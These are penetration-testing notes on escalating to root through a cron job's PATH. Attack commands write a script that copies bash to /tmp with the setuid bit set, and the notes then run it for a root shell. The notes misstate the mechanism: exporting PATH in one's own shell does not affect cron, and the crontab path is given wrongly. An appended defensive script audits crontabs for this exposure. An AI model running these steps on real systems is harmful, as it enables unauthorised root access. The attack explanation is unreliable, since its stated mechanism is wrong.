PATH environment abuse 2

There is another way to escalate privileges to root.

cat /etc/cron

You can add an additional directory to the PATH environment variable and create a new 'overwrite.sh' in it to run.

# Target machine 
echo -e '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash' > /home/bla/overwrite.sh

export PATH=/home/bla:$PATH

Once the /tmp/rootbash file is created, execute it (with -p to preserve the effective UID) to gain a root shell.

/tmp/rootbash -p
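A defender-side check for the two conditions this technique relies on, added here as an example (not part of the original notes): a PATH entry in the crontab that a non-root user can write to, and a job that calls its script without an absolute path. The function name `audit_crontab`, the output labels and the sample crontab are constructed for illustration, and the file is assumed to be in system crontab format (with a user field).

```shell
#!/bin/sh
# audit_crontab FILE  (added example; system crontab format with a user field)
#   PATHDIR <dir> <reason>   PATH entry that is missing, not root-owned,
#                            or group/world-writable
#   RELCMD <user> <command>  job whose command is a bare name, so cron
#                            resolves it through PATH
audit_crontab() {
    file=$1
    # Simplification (assumption): the last PATH= line applies to every job.
    dirs=$(sed -n 's/^PATH=//p' "$file" | tail -n 1)
    old_ifs=$IFS; IFS=:
    set -f; set -- $dirs; set +f      # split PATH on ':' without globbing
    IFS=$old_ifs
    for d in "$@"; do
        if [ ! -d "$d" ]; then
            echo "PATHDIR $d missing"
            continue
        fi
        # -L follows symlinks such as /bin -> /usr/bin; -prune stops descent.
        bad=$(find -L "$d" -prune \( ! -user root -o -perm -0020 -o -perm -0002 \) -print)
        if [ -n "$bad" ]; then
            echo "PATHDIR $d writable-or-not-root-owned"
        fi
    done
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comments, blanks
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }   # VAR=value lines
        {
            u = ($1 ~ /^@/) ? 2 : 6      # @reboot etc. have one time field
            cmd = $(u + 1)
            if (cmd != "" && cmd !~ /^\//) print "RELCMD", $u, cmd
        }
    ' "$file"
}

# Constructed sample modelled on the page: /home/bla comes first in PATH and
# one root job runs overwrite.sh without a path.
sample=$(mktemp)
cat > "$sample" <<'EOF'
SHELL=/bin/sh
PATH=/home/bla:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root overwrite.sh
17 * * * * root /usr/sbin/logrotate /etc/logrotate.conf
EOF
audit_crontab "$sample"
rm -f "$sample"
```

Any `PATHDIR` line combined with a `RELCMD` line for a root job is the exposure described above; the fix is an absolute path in the job and a PATH limited to root-owned, non-writable directories.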
